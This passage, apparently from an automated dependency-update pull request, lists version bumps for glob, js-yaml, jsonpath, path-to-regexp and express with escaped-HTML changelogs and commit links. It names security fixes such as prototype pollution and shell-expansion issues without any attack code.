safely.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e11.1\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/isaacs/node-glob/security/advisories/GHSA-5j98-mcp5-4vw2\"\u003eGHSA-5j98-mcp5-4vw2\u003c/a\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd the \u003ccode\u003e--shell\u003c/code\u003e option for the command line, with a warning\nthat this is unsafe. (It will be removed in v12.)\u003c/li\u003e\n\u003cli\u003eAdd the \u003ccode\u003e--cmd-arg\u003c/code\u003e/\u003ccode\u003e-g\u003c/code\u003e as a way to \u003cem\u003esafely\u003c/em\u003e add positional\narguments to the command provided to the CLI tool.\u003c/li\u003e\n\u003cli\u003eDetect commands with space or quote characters on known shells,\nand pass positional arguments to them safely, avoiding\n\u003ccode\u003eshell:true\u003c/code\u003e execution.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e11.0\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDrop support for node before v20\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e10.4\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003eincludeChildMatches: false\u003c/code\u003e option\u003c/li\u003e\n\u003cli\u003eExport the \u003ccode\u003eIgnore\u003c/code\u003e class\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e10.3\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd \u003ccode\u003e--default -p\u003c/code\u003e flag to provide a default pattern\u003c/li\u003e\n\u003cli\u003eexclude symbolic links to directories when \u003ccode\u003efollow\u003c/code\u003e and \u003ccode\u003enodir\u003c/code\u003e\nare both set\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e10.2\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd glob cli\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e10.1\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReturn \u003ccode\u003e'.'\u003c/code\u003e instead of the empty string \u003ccode\u003e''\u003c/code\u003e when the current\nworking directory is returned as a match.\u003c/li\u003e\n\u003cli\u003eAdd \u003ccode\u003eposix: true\u003c/code\u003e option to return \u003ccode\u003e/\u003c/code\u003e delimited paths, even on\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/56774ef73b495eb0b17cdd0f42921f5ef62297c1\"\u003e\u003ccode\u003e56774ef\u003c/code\u003e\u003c/a\u003e 10.5.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/1e4e297342a09f2aa0ced87fcd4a70ddc325d75f\"\u003e\u003ccode\u003e1e4e297\u003c/code\u003e\u003c/a\u003e bin: Do not expose filenames to shell expansion\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/1f0c1ca01a5f256cd17f543f83e9aaeedd133939\"\u003e\u003ccode\u003e1f0c1ca\u003c/code\u003e\u003c/a\u003e 10.4.5\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/eaf31dcb144750a19842a8319c330d021d4c4d5f\"\u003e\u003ccode\u003eeaf31dc\u003c/code\u003e\u003c/a\u003e whatever, just allow any engines\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/78275168e1bbc7a61e372af1ba58307c27faf0cb\"\u003e\u003ccode\u003e7827516\u003c/code\u003e\u003c/a\u003e 10.4.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/d06c8f8c8288c89a4892f4ebcc23ca21840aa4a1\"\u003e\u003ccode\u003ed06c8f8\u003c/code\u003e\u003c/a\u003e restore support for node 14.latest and 16.latest\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/c14b787771f269651f27f6207aaf410fe171f0b6\"\u003e\u003ccode\u003ec14b787\u003c/code\u003e\u003c/a\u003e 10.4.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/8a69def3cad0de9ba26ca831065ffe448d153de3\"\u003e\u003ccode\u003e8a69def\u003c/code\u003e\u003c/a\u003e node 14 no longer supported\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/eef7ea35afe511079c5bf83862ed57ece2bbf7fa\"\u003e\u003ccode\u003eeef7ea3\u003c/code\u003e\u003c/a\u003e 10.4.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/isaacs/node-glob/commit/c76a7d255c74133ed33dd7aa965598316d12dd25\"\u003e\u003ccode\u003ec76a7d2\u003c/code\u003e\u003c/a\u003e use package-json-from-dist to look up package.json\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/isaacs/node-glob/compare/v10.2.3...v10.5.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 4.1.0 to 4.1.1\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/cc482e775913e6625137572a3712d2826170e53a\"\u003e\u003ccode\u003ecc482e7\u003c/code\u003e\u003c/a\u003e 4.1.1 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/50968b862e75866ef90e626572fe0b2f97b55f9f\"\u003e\u003ccode\u003e50968b8\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/d092d866031751cb27c12d93f3e2470ad74d678b\"\u003e\u003ccode\u003ed092d86\u003c/code\u003e\u003c/a\u003e lint fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/383665ff4248ec2192d1274e934462bb30426879\"\u003e\u003ccode\u003e383665f\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/0d3ca7a27b03a6c974790a30a89e456007d62976\"\u003e\u003ccode\u003e0d3ca7a\u003c/code\u003e\u003c/a\u003e README.md: HTTP =\u0026gt; HTTPS (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/678\"\u003e#678\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/49baadd52af887d2991e2c39a6639baa56d6c71b\"\u003e\u003ccode\u003e49baadd\u003c/code\u003e\u003c/a\u003e doc: 'empty' style option for !!null\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/ba3460eb9d3e4478edcbc29edabe17c2157fc9ce\"\u003e\u003ccode\u003eba3460e\u003c/code\u003e\u003c/a\u003e Fix demo link (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/618\"\u003e#618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/4.1.0...4.1.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `js-yaml` from 3.14.1 to 3.14.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/nodeca/js-yaml/blob/master/CHANGELOG.md\"\u003ejs-yaml's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e[4.1.1] - 2025-11-12\u003c/h2\u003e\n\u003ch3\u003eSecurity\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eFix prototype pollution issue in yaml merge (\u0026lt;\u0026lt;) operator.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/cc482e775913e6625137572a3712d2826170e53a\"\u003e\u003ccode\u003ecc482e7\u003c/code\u003e\u003c/a\u003e 4.1.1 released\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/50968b862e75866ef90e626572fe0b2f97b55f9f\"\u003e\u003ccode\u003e50968b8\u003c/code\u003e\u003c/a\u003e dist rebuild\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/d092d866031751cb27c12d93f3e2470ad74d678b\"\u003e\u003ccode\u003ed092d86\u003c/code\u003e\u003c/a\u003e lint fix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/383665ff4248ec2192d1274e934462bb30426879\"\u003e\u003ccode\u003e383665f\u003c/code\u003e\u003c/a\u003e fix prototype pollution in merge (\u0026lt;\u0026lt;)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/0d3ca7a27b03a6c974790a30a89e456007d62976\"\u003e\u003ccode\u003e0d3ca7a\u003c/code\u003e\u003c/a\u003e README.md: HTTP =\u0026gt; HTTPS (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/678\"\u003e#678\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/49baadd52af887d2991e2c39a6639baa56d6c71b\"\u003e\u003ccode\u003e49baadd\u003c/code\u003e\u003c/a\u003e doc: 'empty' style option for !!null\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/nodeca/js-yaml/commit/ba3460eb9d3e4478edcbc29edabe17c2157fc9ce\"\u003e\u003ccode\u003eba3460e\u003c/code\u003e\u003c/a\u003e Fix demo link (\u003ca href=\"https://redirect.github.com/nodeca/js-yaml/issues/618\"\u003e#618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/nodeca/js-yaml/compare/4.1.0...4.1.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `jsonpath` from 1.1.1 to 1.3.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/dchester/jsonpath/commits\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `path-to-regexp` from 6.2.1 to 6.3.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pillarjs/path-to-regexp/releases\"\u003epath-to-regexp's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eFix backtracking in 6.x\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFixed\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd backtrack protection to 6.x (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/324\"\u003e#324\u003c/a\u003e)  f1253b4\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v6.2.2...v6.3.0\"\u003ehttps://github.com/pillarjs/path-to-regexp/compare/v6.2.2...v6.3.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eUpdated README\u003c/h2\u003e\n\u003cp\u003eNo API changes. Documentation only release.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eChanged\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix readme example  c7ec332\u003c/li\u003e\n\u003cli\u003eUpdate shield URL  e828000\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v6.2.1...v6.2.2\"\u003ehttps://github.com/pillarjs/path-to-regexp/compare/v6.2.1...v6.2.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/75a92c3d7c42159f459ab42f346899152906ea8c\"\u003e\u003ccode\u003e75a92c3\u003c/code\u003e\u003c/a\u003e 6.3.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894\"\u003e\u003ccode\u003ef1253b4\u003c/code\u003e\u003c/a\u003e Add backtrack protection to 6.x (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/324\"\u003e#324\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/28a5b27bb9e7f09dddb573ac50923f2337ea0dbf\"\u003e\u003ccode\u003e28a5b27\u003c/code\u003e\u003c/a\u003e 6.2.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/270876d30b77c83b16c7bb01b578ae9e278c3faa\"\u003e\u003ccode\u003e270876d\u003c/code\u003e\u003c/a\u003e Test on min node 16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/d5a42b69ae5fc128f85783714bbf08408d1560ee\"\u003e\u003ccode\u003ed5a42b6\u003c/code\u003e\u003c/a\u003e Run tests on ubuntu\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/1c265a158c8ffc8c4fb490fc1a9a5020b147d1f2\"\u003e\u003ccode\u003e1c265a1\u003c/code\u003e\u003c/a\u003e Upgrade dev deps, prettier format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/c7ec332e87d8560673884d5629e1cb23cb03cb87\"\u003e\u003ccode\u003ec7ec332\u003c/code\u003e\u003c/a\u003e Fix readme example\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/25da491127d5dfd13eb5ad839bd3559622b77c56\"\u003e\u003ccode\u003e25da491\u003c/code\u003e\u003c/a\u003e Bump node v14 for tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/980d1db9b82fc85019c30da6e689df3beb27e12b\"\u003e\u003ccode\u003e980d1db\u003c/code\u003e\u003c/a\u003e Add v8 coverage\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/e8280006c80604baaf18e8572a983d2a265a6e83\"\u003e\u003ccode\u003ee828000\u003c/code\u003e\u003c/a\u003e Update shield URL\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v6.2.1...v6.3.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `path-to-regexp` from 1.8.0 to 1.9.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pillarjs/path-to-regexp/releases\"\u003epath-to-regexp's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eFix backtracking in 6.x\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFixed\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd backtrack protection to 6.x (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/324\"\u003e#324\u003c/a\u003e)  f1253b4\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v6.2.2...v6.3.0\"\u003ehttps://github.com/pillarjs/path-to-regexp/compare/v6.2.2...v6.3.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eUpdated README\u003c/h2\u003e\n\u003cp\u003eNo API changes. Documentation only release.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eChanged\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix readme example  c7ec332\u003c/li\u003e\n\u003cli\u003eUpdate shield URL  e828000\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v6.2.1...v6.2.2\"\u003ehttps://github.com/pillarjs/path-to-regexp/compare/v6.2.1...v6.2.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/75a92c3d7c42159f459ab42f346899152906ea8c\"\u003e\u003ccode\u003e75a92c3\u003c/code\u003e\u003c/a\u003e 6.3.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894\"\u003e\u003ccode\u003ef1253b4\u003c/code\u003e\u003c/a\u003e Add backtrack protection to 6.x (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/324\"\u003e#324\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/28a5b27bb9e7f09dddb573ac50923f2337ea0dbf\"\u003e\u003ccode\u003e28a5b27\u003c/code\u003e\u003c/a\u003e 6.2.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/270876d30b77c83b16c7bb01b578ae9e278c3faa\"\u003e\u003ccode\u003e270876d\u003c/code\u003e\u003c/a\u003e Test on min node 16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/d5a42b69ae5fc128f85783714bbf08408d1560ee\"\u003e\u003ccode\u003ed5a42b6\u003c/code\u003e\u003c/a\u003e Run tests on ubuntu\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/1c265a158c8ffc8c4fb490fc1a9a5020b147d1f2\"\u003e\u003ccode\u003e1c265a1\u003c/code\u003e\u003c/a\u003e Upgrade dev deps, prettier format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/c7ec332e87d8560673884d5629e1cb23cb03cb87\"\u003e\u003ccode\u003ec7ec332\u003c/code\u003e\u003c/a\u003e Fix readme example\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/25da491127d5dfd13eb5ad839bd3559622b77c56\"\u003e\u003ccode\u003e25da491\u003c/code\u003e\u003c/a\u003e Bump node v14 for tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/980d1db9b82fc85019c30da6e689df3beb27e12b\"\u003e\u003ccode\u003e980d1db\u003c/code\u003e\u003c/a\u003e Add v8 coverage\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/e8280006c80604baaf18e8572a983d2a265a6e83\"\u003e\u003ccode\u003ee828000\u003c/code\u003e\u003c/a\u003e Update shield URL\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v6.2.1...v6.3.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `express` from 4.18.2 to 4.22.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/expressjs/express/releases\"\u003eexpress's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.22.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[!IMPORTANT]\u003cbr /\u003e\nThe prior release (4.22.0) included an erroneous breaking change related to the extended query parser. There is no actual security vulnerability associated with this behavior (CVE-2024-51999 has been rejected). The change has been fully reverted in this release.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cul\u003e\n\u003cli\u003eRelease: 4.22.1 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6934\"\u003eexpressjs/express#6934\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/express/compare/4.22.0...v4.22.1\"\u003ehttps://github.com/expressjs/express/compare/4.22.0...v4.22.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e4.22.0\u003c/h2\u003e\n\u003ch2\u003eImportant: Security\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSecurity fix for \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2024-51999\"\u003eCVE-2024-51999\u003c/a\u003e (\u003ca href=\"https://github.com/expressjs/express/security/advisories/GHSA-pj86-cfqh-vqx6\"\u003eGHSA-pj86-cfqh-vqx6\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRefactor: improve readability by \u003ca href=\"https://github.com/sazk07\"\u003e\u003ccode\u003e@​sazk07\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6190\"\u003eexpressjs/express#6190\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: add support for Node.js@23.0 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6080\"\u003eexpressjs/express#6080\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMethod functions with no path should error by \u003ca href=\"https://github.com/wesleytodd\"\u003e\u003ccode\u003e@​wesleytodd\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/5957\"\u003eexpressjs/express#5957\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: updated github actions ci workflow by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6323\"\u003eexpressjs/express#6323\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: reorder \u003ccode\u003enpm i\u003c/code\u003e steps to fix ci for older node versions by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6336\"\u003eexpressjs/express#6336\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBackport: ci: add node.js 24 to test matrix by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6506\"\u003eexpressjs/express#6506\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(4.x): wider range for query test skip by \u003ca href=\"https://github.com/jonchurch\"\u003e\u003ccode\u003e@​jonchurch\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6513\"\u003eexpressjs/express#6513\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003euse tilde notation for certain dependencies by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6905\"\u003eexpressjs/express#6905\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: qs@6.14.0 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6909\"\u003eexpressjs/express#6909\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: use tilde notation for \u003ccode\u003eqs\u003c/code\u003e by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6919\"\u003eexpressjs/express#6919\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRelease: 4.22.0 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6921\"\u003eexpressjs/express#6921\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/express/compare/4.21.2...4.22.0\"\u003ehttps://github.com/expressjs/express/compare/4.21.2...4.22.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e4.21.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd funding field (v4) by \u003ca href=\"https://github.com/bjohansebas\"\u003e\u003ccode\u003e@​bjohansebas\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6065\"\u003eexpressjs/express#6065\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: path-to-regexp@0.1.11 by \u003ca href=\"https://github.com/blakeembrey\"\u003e\u003ccode\u003e@​blakeembrey\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/5956\"\u003eexpressjs/express#5956\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: bump path-to-regexp@0.1.12 by \u003ca href=\"https://github.com/jonchurch\"\u003e\u003ccode\u003e@​jonchurch\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6209\"\u003eexpressjs/express#6209\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRelease: 4.21.2 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6094\"\u003eexpressjs/express#6094\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/express/compare/4.21.1...4.21.2\"\u003ehttps://github.com/expressjs/express/compare/4.21.1...4.21.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e4.21.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eBackport a fix for CVE-2024-47764 to the 4.x branch by \u003ca href=\"https://github.com/joshbuker\"\u003e\u003ccode\u003e@​joshbuker\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6029\"\u003eexpressjs/express#6029\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRelease: 4.21.1 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6031\"\u003eexpressjs/express#6031\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca 